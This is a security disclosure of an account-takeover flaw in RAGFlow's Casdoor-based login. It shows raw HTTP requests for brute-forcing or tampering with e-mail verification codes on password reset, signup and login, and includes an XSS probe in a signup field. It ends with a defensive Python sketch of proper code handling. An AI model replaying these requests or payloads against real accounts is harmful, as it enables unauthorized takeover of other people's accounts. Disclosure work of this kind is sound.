RAGFlow Arbitrary Account Takeover Vulnerability

2025/5/18 22:57:53

Table of Contents

    • RAGFlow
    • Vulnerability Description
    • [1] Vulnerability Steps
    • [2] Vulnerability Steps
    • [3] Vulnerability Steps

RAGFlow

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine developed by Infiniflow, focused on deep document understanding and designed to provide efficient and scalable question-answering system solutions for various enterprises.

Community activity: over 50,000 stars, 5,000 forks, and more than 250 contributors.

Project Homepage: https://github.com/infiniflow/ragflow

Demo URL: https://demo.ragflow.io

Vulnerability Description

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. Versions 0.18.1 and earlier are vulnerable to an account takeover flaw that allows attackers to brute-force email verification codes to perform arbitrary account registration, login, and password reset. As of the time of publication, no patched version is available.

[1] Vulnerability Steps

1. Navigate to the password reset page.

2. Enter the victim’s username.

3. The system will send a verification code to the victim’s email.

4. Enter any verification code and click “Next.” At this point, intercept the request, which corresponds to the /api/verify-code endpoint.

The specific request packet is as follows:

POST /api/verify-code HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 136
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/forget/RAGFlow
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close

{"application":"RAGFlow","organization":"infiniflow","username":"victim email","name":"aaas2","code":"501777","type":"login"}

5. The response packet is as follows:

6. After replacing the intercepted response packet, the following password reset page is displayed:

7. Clicking “Change Password” triggers the password reset request packet:

POST /api/set-password HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 557
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6zphfvJ3DZ0xdxzB
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/forget/RAGFlow
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close

------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="userOwner"

infiniflow
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="userName"

aaas2
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="oldPassword"


------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="newPassword"

aaassssD21
------WebKitFormBoundary6zphfvJ3DZ0xdxzB
Content-Disposition: form-data; name="code"

501777
------WebKitFormBoundary6zphfvJ3DZ0xdxzB--

Ultimately, the account takeover is successfully achieved.

[2] Vulnerability Steps

1. Navigate to the registration page.

2. Enter the victim’s email address for registration.

3. The system then sends a verification code to the victim’s email.

4. Enter any verification code and click “Sign Up”, then intercept the request. The corresponding endpoint is /api/signup. Perform a brute-force attack on the verification code. As shown below, there is no rate limiting in place:

5. The specific request packet is as follows:

POST /api/signup HTTP/1.1
Host: login.ragflow.io
Cookie: casdoor_session_id=24ca5a1c9266ee51064b56ab498de2ac; organizationTheme={"themeType":"dark","colorPrimary":"#5734d3","borderRadius":2,"isCompact":false,"isEnabled":true}; organizationLogo=https://github.com/infiniflow/ragflow/raw/main/web/src/assets/logo-with-text.png; organizationFootHtml=
Content-Length: 251
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh;q=0.9,en;q=0.8
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Origin: https://login.ragflow.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://login.ragflow.io/signup/oauth/authorize?client_id=87fe30c13277b95d37b5&response_type=code&redirect_uri=https://demo.ragflow.io/v1/user/oauth_callback&scope=read
Accept-Encoding: gzip, deflate
Priority: u=1, i
Connection: close

{"application":"RAGFlow","organization":"infiniflow","username":"aaassssD2","name":"<script>alert(1)</script>","password":"12#Password","confirm":"aaassssD2","email":"Victim EMAIL","emailCode":"698623","agreement":true,"plan":null,"pricing":null}

6. The response packet is as follows:

This indicates that we have successfully achieved arbitrary user registration.

[3] Vulnerability Steps

On the login page, users can also log in with an email verification code. Because this flow relies on the same unthrottled /api/verify-code endpoint, the same brute-force applies here and allows login as an arbitrary user, leading to full account takeover.
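All three flows fail for the same reason: a six-digit code can be guessed without limit and is not tied to the flow it was issued for. The following Python sketch is an added illustration of the missing controls, not RAGFlow's or Casdoor's code; the class, method names and the TTL and attempt-limit constants are assumptions. It expires each code, burns it after a bounded number of wrong guesses, compares in constant time, consumes it on success, and keys it by purpose so a code issued for one flow cannot be replayed in another.

```python
import hmac
import secrets
import time

CODE_TTL_SECONDS = 600     # a code is only valid for 10 minutes (assumed policy)
MAX_FAILED_ATTEMPTS = 5    # five wrong guesses burn the code (assumed policy)


class VerificationCodeStore:
    """Hypothetical store of one-time e-mail codes keyed by (purpose, recipient).

    Illustrates the checks an endpoint like /api/verify-code needs: expiry,
    a bounded number of wrong guesses, constant-time comparison, one-time use,
    and binding to the flow ("forget", "signup", "login") the code was issued for.
    """

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested
        self._codes = {}         # (purpose, recipient) -> {code, expires, failed}

    def issue(self, purpose, recipient):
        code = f"{secrets.randbelow(10 ** 6):06d}"   # 6 digits from a CSPRNG
        self._codes[(purpose, recipient)] = {
            "code": code, "expires": self._now() + CODE_TTL_SECONDS, "failed": 0}
        return code   # goes out by e-mail only, never in the HTTP response

    def verify(self, purpose, recipient, submitted):
        key = (purpose, recipient)
        entry = self._codes.get(key)
        if entry is None:
            return "no_code"                  # never issued, consumed, or burned
        if self._now() > entry["expires"]:
            del self._codes[key]
            return "expired"
        if hmac.compare_digest(entry["code"], str(submitted)):
            del self._codes[key]              # one-time use: no replay
            return "ok"
        entry["failed"] += 1
        if entry["failed"] >= MAX_FAILED_ATTEMPTS:
            del self._codes[key]              # burned: a fresh code must be requested
            return "locked"
        return "wrong"


def brute_force_success_probability(attempts=MAX_FAILED_ATTEMPTS, digits=6):
    """Chance that an attacker limited to `attempts` guesses hits a random code."""
    return attempts / 10 ** digits
```

With the attempt limit in place, guessing a six-digit code succeeds with probability 5 in a million per issued code, instead of being a certainty given enough requests.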
